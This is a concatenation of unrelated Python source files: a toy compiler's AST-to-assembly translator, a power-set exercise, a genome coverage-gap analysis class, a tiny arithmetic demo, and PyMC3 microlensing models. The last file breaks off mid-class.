                          extra_frames=posinfo_ext if posinfo_ext is not None else [])
        self.variables[varname] = value

    def copy(self):
        """Return a shallow copy; struct/field objects are shared."""
        s = Scope()
        s.structs = self.structs.copy()
        s.fields = self.fields.copy()
        s.variables = self.variables.copy()
        s.structs_prev_decl = self.structs_prev_decl.copy()
        s.fields_prev_decl = self.fields_prev_decl.copy()
        s.variables_prev_decl = self.variables_prev_decl.copy()
        return s
def translate(program):
    """Translate a parsed program (a list of Struct/Func declarations)
    to assembly on stdout.

    Structs are registered into a global scope first so that functions
    can reference any struct regardless of declaration order.
    """
    scope = Scope()
    print("\t.text")
    # Pass 1: collect all struct declarations.
    for decl in program:
        if isinstance(decl, Struct):
            scope.add_struct(decl)
    # Pass 2: translate each function body.
    for decl in program:
        if isinstance(decl, Func):
            funcscope = scope.copy()
            cc = ir.CodeCollect()
            # Fetch incoming arguments, then copy each into a fresh
            # register bound to the argument's name.
            arg_ils = [cc.add_instr(ir.rarg, i) for i in range(len(decl.argnames))]
            for arg_il, (argname, posinfo) in zip(arg_ils, decl.argnames):
                arg_copy_il = cc.add_instr(ir.copy, arg_il)
                funcscope.add_var(argname, RegValue(arg_copy_il), posinfo)
            translate_stmts(cc, funcscope, decl.body)
            # Implicit `return 0` in case control falls off the end.
            Return(Num(0)).translate(cc, funcscope)
            # NOTE(review): the original file's indentation was lost; this
            # nesting assumes the whole emission step is guarded by
            # ir.intermlog — confirm against the upstream source.
            if ir.intermlog:
                print("\t.globl\t{0}".format(decl.name))
                print("\t.type\t{0}, @function".format(decl.name))
                print(decl.name + ":")
                cc.drop_unused_ops()
                #cc.print_()
                # Instruction selection / final emission for this function.
                import translate, isel_hardcoded
                translate.translate(cc, isel_hardcoded)
                #print("# end")
                print("\t.size\t{0}, .-{0}".format(decl.name))
            #print ("func {}(?)".format(decl.name), cc.instructions)
            #print(decl)
            #print(fieldnames)
def translate_stmts(cc, scope, stmts):
    """Translate each statement in *stmts* into the code collector *cc*."""
    for statement in stmts:
        statement.translate(cc, scope)
class UnaryOp:
    """A prefix operator applied to a single operand expression."""

    def __init__(self, op, rhs, posinfo):
        self.op = op
        self.rhs = rhs
        # BUG FIX: posinfo was accepted but discarded, so errors involving
        # this node could not report a source position. Keep it, like the
        # other AST node classes do.
        self.posinfo = posinfo

    def __repr__(self):
        return "UnaryOp {0} {1}".format(self.op, self.rhs)

    def translate(self, cc, scope):
        """Emit the operand, then the unary instruction; return its IL value."""
        return cc.add_instr(self.op, self.rhs.translate(cc, scope))
class BinOp:
    """Arithmetic binary operator node; its result type is numeric."""

    def __init__(self, lhs, op, rhs):
        self.lhs = lhs
        self.op = op
        self.rhs = rhs
        self.datatype = dt_num

    def __repr__(self):
        return "BinOp {0} {1} {2}".format(self.lhs, self.op, self.rhs)

    def translate(self, cc, scope):
        """Emit both operands (left first), then the operator instruction."""
        left_il = self.lhs.translate(cc, scope)
        right_il = self.rhs.translate(cc, scope)
        return cc.add_instr(self.op, left_il, right_il)
class BoolOp:
    """Comparison/boolean binary operator node; its result type is bool."""

    def __init__(self, lhs, op, rhs):
        self.lhs = lhs
        self.op = op
        self.rhs = rhs
        self.datatype = dt_bool

    def __repr__(self):
        return "BoolOp {0} {1} {2}".format(self.lhs, self.op, self.rhs)

    def translate(self, cc, scope):
        """Emit both operands (left first), then the comparison instruction."""
        left_il = self.lhs.translate(cc, scope)
        right_il = self.rhs.translate(cc, scope)
        return cc.add_instr(self.op, left_il, right_il)
class Func:
    """A function declaration: name, argument (name, posinfo) pairs, body."""

    def __init__(self, name, argnames, stmts):
        self.name = name
        # Freeze the argument list so it cannot be mutated after parsing.
        self.argnames = tuple(argnames)
        self.body = stmts

    def __repr__(self):
        return "Func {0} {1} {{{2}}}".format(self.name, self.argnames, self.body)
class Struct:
    """A struct declaration: name plus (field name, posinfo) pairs."""

    def __init__(self, name, fieldnames, posinfo=None):
        self.name = name
        # Freeze the field list so it cannot be mutated after parsing.
        self.fieldnames = tuple(fieldnames)
        self.posinfo = posinfo

    def __repr__(self):
        return "Struct {0} {1}".format(self.name, self.fieldnames)
class Return:
    """A return statement carrying the expression to return."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return "Return({0})".format(self.value)

    def translate(self, cc, scope):
        """Copy the return value into a fresh register, then emit ret."""
        result_copy = cc.add_instr(ir.copy, self.value.translate(cc, scope))
        cc.add_instr(ir.ret, result_copy)
class Cond:
    """A multi-way conditional statement node.

    cases is a list of (condition_expr, body_stmts) pairs; the first
    case whose condition holds is executed.
    """

    def __init__(self, cases):
        self.cases = cases

    def __repr__(self):
        return "Cond{0}".format(self.cases)

    def translate(self, cc, scope):
        """Emit the dispatch code, then every case body.

        Layout: first all condition tests with conditional jumps to the
        matching body's label, then an unconditional jump past everything
        (no case matched), then each body followed by a jump to the end
        label (omitted for the last body, which falls through).
        """
        end_label = ir.Label()
        labels = []
        zero = cc.add_const(0)
        # Phase 1: one test-and-jump per case.
        # NOTE(review): the taken-branch polarity depends on ir.gt/ir.jump
        # semantics (jump when `0 > cond` is true?) — confirm in the ir
        # module before changing anything here.
        for condition, body in self.cases:
            cond_il = condition.translate(cc, scope)
            label = ir.Label()
            iil = cc.add_instr(ir.gt, zero, cond_il)
            cc.add_instr(ir.jump, label, iil)
            labels.append(label)
        cc.add_instr(ir.jump, end_label)
        # Phase 2: emit each case body at its label.
        for i, (condition, body) in enumerate(self.cases):
            label = labels[i]
            # Bind the label to the current instruction index.
            label.target = ".t{0}".format(len(cc.instructions))
            cc.add_instr("nop", label)
            translate_stmts(cc, scope, body)
            is_last = (i == len(self.cases)-1)
            if not is_last:
                cc.add_instr(ir.jump, end_label)
        end_label.target = ".t{0}".format(len(cc.instructions))
        cc.add_instr("nop", end_label)
class Num:
    """An integer literal expression node."""

    def __init__(self, num):
        self.num = num
        self.datatype = dt_num

    def __repr__(self):
        return "#{0}".format(self.num)

    def translate(self, cc, scope):
        """Literals become constant-pool entries; no instructions emitted."""
        return cc.add_const(self.num)
class Call:
    """A function-call expression node."""

    def __init__(self, funcname, args):
        self.funcname = funcname
        self.args = tuple(args)

    def __repr__(self):
        return "{0}!{1}".format(self.funcname, self.args)

    def translate(self, cc, scope):
        """Evaluate all arguments left-to-right, then copy each into a
        fresh register, emit the call, and copy out the return value."""
        evaluated = [arg.translate(cc, scope) for arg in self.args]
        copies = [cc.add_instr(ir.copy, il) for il in evaluated]
        retval = cc.add_instr(ir.call, self.funcname, *copies)
        return cc.add_instr(ir.copy, retval)
class Access:
    """Base class for l-value nodes; .write holds the RHS of an assignment
    (None for a plain read)."""

    write = None
    datatype = dt_num

    def write_repr(self):
        """Return ' = <rhs>' when this access is an assignment, else ''."""
        return "" if self.write is None else " = {0}".format(self.write)

    def modwrite(self, value):
        """Turn this access into an assignment of *value*; returns self."""
        self.write = value
        return self
class VarAccess(Access):
    """Read or (when .write is set) assign a named variable."""

    def __init__(self, name, posinfo=None):
        self.name = name
        self.posinfo = posinfo

    def __repr__(self):
        return self.name + self.write_repr()

    def translate(self, cc, scope):
        """Load the variable, or store the RHS into it and yield the RHS."""
        if self.name not in scope.variables:
            message = "No variable '{0}' in this context.".format(self.name)
            raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
        slot = scope.variables[self.name]
        if not self.write:
            return slot.load(cc)
        store_value = self.write.translate(cc, scope)
        slot.store(cc, store_value)
        return store_value
class FieldAccess(Access):
    """Read or assign a struct field through a base-address expression."""

    def __init__(self, base, name, posinfo=None):
        self.base = base
        self.name = name
        self.posinfo = posinfo

    def __repr__(self):
        return "{0}.{1}".format(self.base, self.name) + self.write_repr()

    def translate(self, cc, scope):
        """Compute the field address, then emit a load or a store."""
        if self.name not in scope.fields:
            message = "No field '{0}' in this context.".format(self.name)
            raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
        origin_struct, offset = scope.fields[self.name]
        # Field address = base pointer + 8 bytes per preceding field.
        base_il = self.base.translate(cc, scope)
        addr = cc.add_instr(ir.add, base_il, cc.add_const(offset * 8))
        if not self.write:
            return cc.add_instr(ir.load, addr)
        newval = self.write.translate(cc, scope)
        cc.add_instr(ir.store, addr, newval)
        return newval
class Let:
    """Introduce register-backed local bindings for a statement block."""

    def __init__(self, lets, stmts):
        self.lets = lets
        self.body = stmts

    def __repr__(self):
        return "Let{0} {{{1}}}".format(self.lets, self.body)

    def translate(self, cc, scope):
        """Bind each initializer, then translate the body in the new scope.

        Initializers are evaluated in the OUTER scope, so later lets in
        the same Let cannot reference earlier ones.
        """
        inner_scope = scope.copy()
        for varname, value, varname_posinfo in self.lets:
            bound = RegValue(value.translate(cc, scope))
            inner_scope.add_var(varname, bound, varname_posinfo)
        for stmt in self.body:
            stmt.translate(cc, inner_scope)
class With:
    """Expose the fields of a struct instance as variables over a block.

    `base` evaluates to the struct's base address; each field becomes a
    RAM-backed variable at base + 8*index for the duration of the body.
    """

    def __init__(self, base, structname, stmts, posinfo):
        self.base = base
        self.structname = structname
        self.body = stmts
        self.posinfo = posinfo

    def __repr__(self):
        return "with {0}:{1} {{{2}}}".format(self.base, self.structname, self.body)

    def translate(self, cc, scope):
        # Work on a copy so the field bindings vanish after the block.
        scope = scope.copy()
        if self.structname not in scope.structs:
            message = "'with' referencing the unknown struct {0!r}".format(self.structname)
            raise ThreeError(MultiplePosInfo([(message, self.posinfo)]))
        basil = self.base.translate(cc, scope)
        struct = scope.structs[self.structname]
        for i, (fieldname, field_posinfo) in enumerate(struct.fieldnames):
            # Each field occupies 8 bytes.
            offset = i * 8
            addr = cc.add_instr(ir.add, basil, cc.add_const(offset))
            scope.add_var(fieldname, RAMValue(addr), self.posinfo, [("Originates from", field_posinfo)])
        for stmt in self.body:
            stmt.translate(cc, scope)
|
'''
Power Set: Write a method to return all subsets of a set.
'''
import copy
def getPowerSet(set):
    """Return every subset of list *set* as a list of lists, or None for None."""
    return None if set is None else getPowerSetHelper(set)
def getPowerSetHelper(set):
    """Recursively build the power set of list *set* as a list of lists."""
    if len(set) == 0:
        # Base case: the only subset of the empty set is the empty set.
        return [[]]
    without_first = getPowerSetHelper(set[1:])
    # Every subset either excludes the first element (without_first) or
    # includes it (a deep copy of each such subset, extended by set[0]).
    with_first = [copy.deepcopy(subset) + [set[0]] for subset in without_first]
    return without_first + with_first
def getPowerSetTemplate(set):
    """Print every subset of *set* via backtracking; returns None."""
    if set is None:
        return None
    # Start from an empty path at position 0; the helper prints subsets.
    getPowerSetTemplateHelper([], set, 0)
    return
def getPowerSetTemplateHelper(path, set, pos):
    """Print *path*, then extend it with each element from position *pos* on."""
    print(path)
    for index in range(pos, len(set)):
        path.append(set[index])
        getPowerSetTemplateHelper(path, set, index + 1)
        # Undo the choice before trying the next element (backtrack).
        path.pop()
    return
def getUniquePowerSet(set):
    """Print each distinct subset of *set* (assumed sorted); returns None."""
    if set is not None:
        getUniquePowerSetHelper([], set, 0)
    return None
def getUniquePowerSetHelper(path, set, pos):
    """Print *path*, then extend it with each distinct element from *pos* on.

    Requires *set* to be sorted so that equal elements are adjacent.
    """
    print(path)
    for index in range(pos, len(set)):
        # BUG FIX: the duplicate-skip test compared against index 0
        # (`index > 0`), which also skipped the FIRST use of a repeated
        # element at deeper recursion levels — e.g. for [1, 1] the subset
        # [1, 1] was never produced. Duplicates must only be skipped
        # within the same recursion level, i.e. relative to *pos*.
        if (index > pos) and (set[index - 1] == set[index]):
            continue
        path.append(set[index])
        getUniquePowerSetHelper(path, set, index + 1)
        path.pop(len(path) - 1)
    return
if __name__ == '__main__':
    set = [3,2]
    # my method: returns the power set as a list of lists
    print(getPowerSet(set))
    # template method: prints each subset on its own line
    print()
    getPowerSetTemplate(set)
    # unique power set template (input must be sorted for dedup to work)
    print()
    set = [1,1,2,2]
    getUniquePowerSet(set)
|
import os
import glob
import numpy as np
import collections
import subprocess
import sys
from Bio.Blast.Applications import NcbiblastnCommandline
import matplotlib as mpl
# mpl.use('Agg')
import matplotlib.pyplot as plt
import stat
import math
import logging
logging.basicConfig(format='[%(asctime)s][%(funcName)s][%(levelname)s] - %(message)s', level=logging.DEBUG)
logger = logging.getLogger(__name__)
class gap(object):
    """Find and report low-coverage regions ("gaps") of a reference genome.

    A gap is a maximal run of positions whose read coverage lies within
    [minCoverage, maxCoverage] (inclusive). Coverage is filled from a
    pysam-style alignment file; the genome sequence itself is read from
    a FASTA file.
    """

    def __init__(
        self,
        minCoverage,
        maxCoverage,
        genome,
    ):
        # Inclusive coverage window that defines a "gap" position.
        self.minCoverage = minCoverage
        self.maxCoverage = maxCoverage
        # Path to the genome FASTA file.
        self.genome = genome
        self.maxRefLen = 0
        self.referenceGenome = ''
        self.coverageArray = np.zeros(self.maxRefLen)
        # Maps gap start position -> gap end position (both inclusive).
        self.gapDic = {}
        self.baseContent = collections.defaultdict(int)
        self.genomeSeq = ''
        self.kmerCounter = collections.defaultdict(int)

    def findRefGenome(
        self,
        samfile
    ):
        """Pick the longest reference sequence listed in *samfile*'s header."""
        self.maxRefLen = max([x['LN'] for x in samfile.header['SQ']])
        for x in samfile.header['SQ']:
            if x['LN'] == self.maxRefLen:
                self.referenceGenome = x['SN']

    def fillCoverageArray(
        self,
        samfile):
        """Fill per-position read depth for the chosen reference."""
        self.coverageArray = np.zeros(self.maxRefLen)
        for base in samfile.pileup(self.referenceGenome):
            self.coverageArray[base.pos] = base.n

    def findGaps(self):
        """Scan the coverage array and record maximal in-window runs."""
        tempRange = []
        pos = 0
        while pos < self.maxRefLen:
            if (pos % 1000000 == 0) and pos != 0:
                logging.debug('%d bases processed' % pos)
            if self.minCoverage <= self.coverageArray[pos] <= self.maxCoverage:
                tempRange.append(pos)
            else:
                if tempRange:
                    self.gapDic[tempRange[0]] = tempRange[-1]
                    tempRange = []
            pos += 1
        # BUG FIX: a gap extending to the very end of the reference was
        # silently dropped because the open run was never flushed.
        if tempRange:
            self.gapDic[tempRange[0]] = tempRange[-1]

    def countBaseContent(
        self,
        sequence
    ):
        """Accumulate per-base counts (upper-cased) into self.baseContent.

        NOTE: this method was defined twice with identical bodies in the
        original source; the redundant duplicate has been removed.
        """
        for base in sequence:
            self.baseContent[base.upper()] += 1

    def countKmers(
        self,
        sequence,
        kmer=9  # change at some point....
    ):
        """Count the leading *kmer*-mer of *sequence*.

        NOTE(review): only the first k-mer is counted, not a sliding
        window — confirm this is the intended behavior.
        """
        if len(sequence) >= kmer:
            self.kmerCounter[sequence[:kmer]] += 1

    def readGenome(self):
        """Load the genome FASTA into self.genomeSeq.

        Assumes a single-record FASTA: only the first (header) line is
        skipped. TODO(review): confirm multi-record files never occur.
        """
        with open(self.genome, 'r') as fobj:
            # FIX: use the builtin next() instead of the Python-2-only
            # file.next() method (works on both Python 2 and 3).
            next(fobj)
            sequence = []
            for line in fobj:
                sequence.append(line.strip())
        self.genomeSeq = "".join(sequence)

    def writeGaps(self, gapfilename):
        """Write a CSV of all gaps with sequence and per-position coverage.

        NOTE: the coverage column is itself comma-joined, so rows have a
        variable number of fields (kept for backward compatibility).
        """
        with open(gapfilename, 'w') as fout:
            fout.write(',START,STOP,LENGTH,SEQUENCE,POSITIONAL COVERAGE\n')
            counter = 1
            self.readGenome()
            for start, stop in self.gapDic.items():
                # FIX: removed a leftover Python-2 `print` statement that
                # dumped every coverage value to stdout (and was a syntax
                # error under Python 3).
                coverages = [self.coverageArray[x] for x in range(start, stop + 1)]
                tList = ','.join(str(e) for e in coverages)
                sequence = self.genomeSeq[start:stop + 1]
                fout.write('%i,%i,%i,%i,%s,%s' % (counter, start, stop,
                                                  stop + 1 - start, sequence, tList))
                fout.write('\n')
                counter += 1

    def plotLocSize(
        self,
        gaphistogram,
        filename,
        sampleFolder,
        logY
    ):
        """Bar-plot gap length vs. genomic location and save as PDF.

        sampleFolder is accepted for interface compatibility but unused.
        """
        gapLocation = []
        gapSize = []
        for start, stop in self.gapDic.items():
            gapLocation.append(start)
            gapSize.append(stop + 1 - start)
        fig = plt.figure()
        # Optionally plot log(gap length) instead of the raw length.
        heights = np.log(gapSize) if logY else gapSize
        plt.bar(
            gapLocation,
            heights,
            0.1,
            color='#0099cc',
            edgecolor='#0099cc'
        )
        plt.xlim([-100000, self.maxRefLen + 100000])
        plt.xlabel('Gap location in genome')
        plt.ylabel('Length of gap')
        plt.title('%s: gaps within coverages %i-%iX' % (filename, self.minCoverage, self.maxCoverage), fontsize=12)
        plt.savefig(gaphistogram, format='PDF')

    def writestats(self, outputFile, filename):
        """Append one CSV row of summary statistics for the found gaps."""
        with open(outputFile, 'a') as fout:
            lenInfo = []
            for start, stop in self.gapDic.items():
                sequence = self.genomeSeq[start:stop + 1]
                self.countBaseContent(sequence)
                lenInfo.append(int(len(sequence)))
            totalBases = int(self.baseContent['A'] + self.baseContent['T']
                             + self.baseContent['G'] + self.baseContent['C'])
            # (A dead no-op expression recomputing the AT% was removed here.)
            fout.write('\n')
            fout.write('%s,%.2f,%.2f,%.2f,%i,%.2f,%.3f,%i' % (
                filename,
                (sum(lenInfo) * 1.0 / self.maxRefLen) * 100.0,     # % of genome in gaps
                (self.baseContent['A'] + self.baseContent['T']) * 100. / totalBases,
                (self.baseContent['G'] + self.baseContent['C']) * 100. / totalBases,
                len(lenInfo),                                      # number of gaps
                sum(lenInfo) * 1.0 / len(lenInfo),                 # mean gap length
                np.std(lenInfo, dtype=np.float64),
                max(lenInfo)
            ))

    def reset(self):
        """Clear all per-sample state so the object can be reused."""
        self.maxRefLen = 0
        self.referenceGenome = ''
        self.coverageArray = np.zeros(self.maxRefLen)
        self.gapDic = {}
        self.baseContent = collections.defaultdict(int)
        self.genomeSeq = ''
        self.kmerCounter = collections.defaultdict(int)
|
def mult_x_add_y(number, x, y):
    """Print number*x + y (prints the result rather than returning it)."""
    result = number * x + y
    print(result)

# Demo: 5*2 + 3
mult_x_add_y(5, 2, 3)
# 13
|
import sys
import numpy as np
import pymc3 as pm
import theano.tensor as T
import caustic as ca
sys.path.append("../")
from utils import find_alert_time
class DefaultModel(ca.models.SingleLensModel):
    """
    Default single-lens microlensing model.

    Free parameters: blend fraction ``f``, baseline magnitude ``m_b``,
    and log-parameters ``ln_delta_t0`` (time of peak, offset from the
    alert time), ``ln_A0`` (peak magnification) and ``ln_tE`` (Einstein
    crossing time). The Gaussian log-likelihood is attached to the
    PyMC3 model as a Potential.
    """

    def __init__(self, data):
        super(DefaultModel, self).__init__(data, standardize=False)
        # Compute alert time
        alert_time = find_alert_time(data)
        n_bands = len(data.light_curves)
        BoundedNormal = pm.Bound(pm.Normal, lower=0.0)  # NOTE(review): unused
        BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
        # Initialize linear parameters
        f = pm.Uniform("f", 0.0, 1.0, testval=0.9)
        m_b = pm.Normal("m_b", mu=15.0, sd=10.0, testval=15.0)
        # Baseline magnitude -> flux (zero point 22).
        F_base = 10 ** (-(m_b - 22.0) / 2.5)
        # Initialize non-linear parameters
        ## Posterior is multi-modal in t0 and it's critical that it is
        ## initialized near the true value
        ln_t0_testval = T.log(ca.utils.estimate_t0(data) - alert_time)
        ln_delta_t0 = pm.Normal("ln_delta_t0", 4.0, 5.0, testval=ln_t0_testval)
        delta_t_0 = T.exp(ln_delta_t0)
        ln_A0 = pm.Exponential("ln_A0", 0.1, testval=np.log(3.0))
        ln_tE = pm.Normal("ln_tE", mu=4.0, sd=5.0, testval=3.0)
        # Deterministic transformations
        tE = pm.Deterministic("tE", T.exp(ln_tE))
        # Impact parameter u0 derived from the peak magnification A0.
        u0 = pm.Deterministic(
            "u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
        )
        # Compute the trajectory of the lens
        trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
        u = trajectory.compute_trajectory(self.t)
        # Compute the magnification
        mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
        # Compute the mean model
        mean = f * F_base * mag + (1 - f) * F_base
        # We allow for rescaling of the error bars by a constant factor
        c = BoundedNormal_1(
            "c",
            mu=T.ones(n_bands),
            sd=2.0 * T.ones(n_bands),
            testval=1.5 * T.ones(n_bands),
            shape=(n_bands),
        )
        # Diagonal terms of the covariance matrix
        var_F = (c * self.sig_F) ** 2
        # Compute the Gaussian log_likelihood, add it as a potential term to the model
        ll = self.compute_log_likelihood(self.F - mean, var_F)
        pm.Potential("log_likelihood", ll)
        # Save logp-s for each variable (used later for importance reweighting).
        pm.Deterministic("logp_f", f.distribution.logp(f))
        pm.Deterministic("logp_ln_delta_t0", ln_delta_t0.distribution.logp(ln_delta_t0))
        pm.Deterministic("logp_ln_A0", ln_A0.distribution.logp(ln_A0))
        pm.Deterministic("logp_ln_tE", ln_tE.distribution.logp(ln_tE))
class DefaultModelUniformPriors(ca.models.SingleLensModel):
    """
    Variant of DefaultModel with uniform priors on all parameters.

    This is just for the purpose of computing the maximum likelihood
    solution (flat priors make the MAP coincide with the MLE within
    the bounds).
    """

    def __init__(self, data):
        super(DefaultModelUniformPriors, self).__init__(data, standardize=False)
        # Compute alert time
        alert_time = find_alert_time(data)
        n_bands = len(data.light_curves)
        BoundedNormal = pm.Bound(pm.Normal, lower=0.0)  # NOTE(review): unused
        BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
        # Initialize linear parameters
        f = pm.Uniform("f", 0.0001, 0.999, testval=0.9)
        m_b = pm.Uniform("m_b", 8.0, 25.0, testval=15.0)
        # Baseline magnitude -> flux (zero point 22).
        F_base = 10 ** (-(m_b - 22.0) / 2.5)
        # Initialize non-linear parameters
        ## Posterior is multi-modal in t0 and it's critical that it is
        ## initialized near the true value
        t0_testval = T.log(ca.utils.estimate_t0(data) - alert_time)
        ln_delta_t0 = pm.Uniform("ln_delta_t0", -1.0, 10.0, testval=t0_testval)
        delta_t_0 = T.exp(ln_delta_t0)
        ln_A0 = pm.Uniform("ln_A0", 0.1, 100, testval=np.log(3.0))
        ln_tE = pm.Uniform("ln_tE", -1.0, 10, testval=3.0)
        # Deterministic transformations
        tE = pm.Deterministic("tE", T.exp(ln_tE))
        # Impact parameter u0 derived from the peak magnification A0.
        u0 = pm.Deterministic(
            "u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
        )
        # Compute the trajectory of the lens
        trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
        u = trajectory.compute_trajectory(self.t)
        # Compute the magnification
        mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
        # Compute the mean model
        mean = f * F_base * mag + (1 - f) * F_base
        # We allow for rescaling of the error bars by a constant factor
        c = BoundedNormal_1(
            "c",
            mu=T.ones(n_bands),
            sd=5.0 * T.ones(n_bands),
            testval=1.5 * T.ones(n_bands),
            shape=(n_bands),
        )
        # Diagonal terms of the covariance matrix
        var_F = (c * self.sig_F) ** 2
        # Compute the Gaussian log_likelihood, add it as a potential term to the model
        ll = self.compute_log_likelihood(self.F - mean, var_F)
        pm.Potential("log_likelihood", ll)
class HierarchicalModel(pm.Model):
    """
    Hierarchical model using the importance-resampling trick.

    Given per-event posterior samples (``samples_tensor``, indexed as
    [event, sample, parameter] judging by the slicing below) and the
    per-parameter prior log-probabilities of those samples
    (``samples_logp_tensor``), infers the hyperparameters of
    population-level priors by reweighting each event's samples with
    the ratio of new prior to old prior.
    """

    def __init__(self, samples_tensor, samples_logp_tensor):
        super(HierarchicalModel, self).__init__()
        # This will take a while, loading the massive arrays into memory is costly
        BoundedNormal = pm.Bound(pm.Normal, lower=0.0)
        # Parameters of the prior for blend fraction f
        alpha_f = BoundedNormal("alpha_f", 0, 10.0, testval=5.0)
        beta_f = BoundedNormal("beta_f", 0, 10.0, testval=1.0)
        # Parameters of the prior for delta_t0
        mu_ln_delta_t0 = pm.Normal("mu_ln_delta_t0", 4, 5.0, testval=3.0)
        sig_ln_delta_t0 = BoundedNormal("sig_ln_delta_t0", 1.0, 5.0, testval=1.0)
        # Parameters of the prior for ln_A0
        lam_ln_A0 = BoundedNormal("lam_ln_A0", 0.0, 1.0, testval=0.1)
        # Parameters of the prior for ln_tE
        mu_ln_tE = pm.Normal("mu_ln_tE", 3.0, 10.0, testval=3.0)
        sig_ln_tE = BoundedNormal("sig_ln_tE", 1.0, 20.0, testval=1.0)

        def compute_ll():
            # NOTE(review): despite the name, this is the number of EVENTS
            # (first axis of samples_tensor), not photometric bands.
            n_bands = T.shape(samples_tensor).eval()[0]
            result = 0.0
            # Iterate over members of the population
            for i in range(n_bands):
                # Compute new prior log-probability of each stored sample.
                # ln_A0
                log_new_prior = pm.Exponential.dist(lam_ln_A0).logp(
                    samples_tensor[i, :, 0]
                )
                # delta_t0
                log_new_prior += pm.Normal.dist(
                    mu=mu_ln_delta_t0, sd=sig_ln_delta_t0
                ).logp(samples_tensor[i, :, 1])
                # ln_tE
                log_new_prior += pm.Normal.dist(mu=mu_ln_tE, sd=sig_ln_tE).logp(
                    samples_tensor[i, :, 2]
                )
                # f
                log_new_prior += pm.Beta.dist(alpha_f, beta_f).logp(
                    samples_tensor[i, :, 3]
                )
                # Compute old prior
                log_old_prior = T.sum(samples_logp_tensor[i], axis=1)
                # Compute importance resampling fraction
                log_frac = log_new_prior - log_old_prior
                # Monte-Carlo average of the prior ratio over the samples.
                result += T.log(T.sum(T.exp(log_frac)) / T.shape(samples_tensor)[1])
            return result

        pm.Potential("log_likelihood", compute_ll())
class PredictiveModelEmpiricalPriors(ca.models.SingleLensModel):
    """
    Model optimized for prediction of ongoing events, based on Albrow (2004).

    The constructor arguments are the (empirically determined)
    hyperparameters of the priors on ln_A0, ln_delta_t0 and ln_tE; their
    defaults reproduce the previously hard-coded values.
    """

    def __init__(
        self,
        data,
        lam_ln_A0=0.62569998,
        mu_ln_delta_t0=3.14397,
        sig_ln_delta_t0=1.198987,
        mu_ln_tE=3.746819,
        sig_ln_tE=1.26364,
    ):
        super(PredictiveModelEmpiricalPriors, self).__init__(data, standardize=False)
        # Compute alert time
        alert_time = find_alert_time(data)
        n_bands = len(data.light_curves)
        BoundedNormal = pm.Bound(pm.Normal, lower=0.0)  # NOTE(review): unused
        BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
        # Initialize linear parameters
        f = pm.Uniform("f", 0.0, 1.0, testval=0.5)
        m_b = pm.Normal("m_b", mu=15.0, sd=10.0, testval=15.0)
        # Baseline magnitude -> flux (zero point 22).
        F_base = 10 ** (-(m_b - 22.0) / 2.5)
        # Initialize non-linear parameters.
        # BUG FIX: the prior hyperparameters passed to the constructor were
        # ignored and the literal defaults re-hard-coded here; use the
        # parameters instead (the defaults keep the original behavior).
        ln_delta_t0 = pm.Normal("ln_delta_t0", mu_ln_delta_t0, sig_ln_delta_t0, testval=3.0)
        delta_t_0 = T.exp(ln_delta_t0)
        ln_A0 = pm.Exponential("ln_A0", lam_ln_A0, testval=2.0)
        ln_tE = pm.Normal("ln_tE", mu=mu_ln_tE, sd=sig_ln_tE, testval=3.0)
        # Deterministic transformations
        tE = pm.Deterministic("tE", T.exp(ln_tE))
        u0 = pm.Deterministic(
            "u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
        )
        # Compute the trajectory of the lens
        trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t_0, u0, tE)
        u = trajectory.compute_trajectory(self.t)
        # Compute the magnification
        mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
        # Compute the mean model
        mean = f * F_base * mag + (1 - f) * F_base
        # We allow for rescaling of the error bars by a constant factor
        c = BoundedNormal_1(
            "c",
            mu=T.ones(n_bands),
            sd=2.0 * T.ones(n_bands),
            testval=1.5 * T.ones(n_bands),
            shape=(n_bands),
        )
        # Diagonal terms of the covariance matrix
        var_F = (c * self.sig_F) ** 2
        # Compute the Gaussian log_likelihood, add it as a potential term to the model
        ll = self.compute_log_likelihood(self.F - mean, var_F)
        pm.Potential("log_likelihood", ll)
class PredictiveModel(ca.models.SingleLensModel):
    """
    Hierarchical predictive model. Uses posterior samples over the
    hyperparameters describing a population of events to reweight the
    priors on key parameters.
    """

    def __init__(self, data, samples_tensor, fit_blending=False):
        super(PredictiveModel, self).__init__(data, standardize=False)
        # Compute alert time
        alert_time = find_alert_time(data)
        n_bands = len(data.light_curves)
        BoundedNormal = pm.Bound(pm.Normal, lower=0.0)  # NOTE(review): unused
        BoundedNormal_1 = pm.Bound(pm.Normal, lower=1.0)
        # mock prior if fit_blending=True
        f = pm.Uniform("f", 0.0, 1.0, testval=0.5, shape=(n_bands))
        m_b = pm.Normal(
            "m_b",
            mu=15.0 * T.ones(n_bands),
            sd=10.0 * T.ones(n_bands),
            testval=22.0
            - 2.5
            * T.log10(T.as_tensor_variable(ca.utils.estimate_baseline_flux(data))),
            shape=(n_bands),
        )
        F_base = 10 ** (-(m_b - 22.0) / 2.5)
        # The following are mock priors, they don't do anything, it's just so
        # PyMC3 initializes the RVs; the real priors enter via ll_hyper below.
        ln_delta_t0 = pm.Uniform("ln_delta_t0", -1, 8, testval=3.0)  # mock prior
        ln_A0 = pm.Uniform("ln_A0", 0.0, 100, testval=2.0)  # mock prior
        ln_tE = pm.Uniform("ln_tE", -1, 8, testval=3.0)  # mock prior
        delta_t0 = T.exp(ln_delta_t0)
        u0 = pm.Deterministic(
            "u0", T.sqrt(2 * T.exp(ln_A0) / T.sqrt(T.exp(ln_A0) ** 2 - 1) - 2)
        )
        # Deterministic transformations
        tE = pm.Deterministic("tE", T.exp(ln_tE))
        # Compute the trajectory of the lens
        trajectory = ca.trajectory.Trajectory(data, alert_time + delta_t0, u0, tE)
        u = trajectory.compute_trajectory(self.t)
        # Compute the magnification
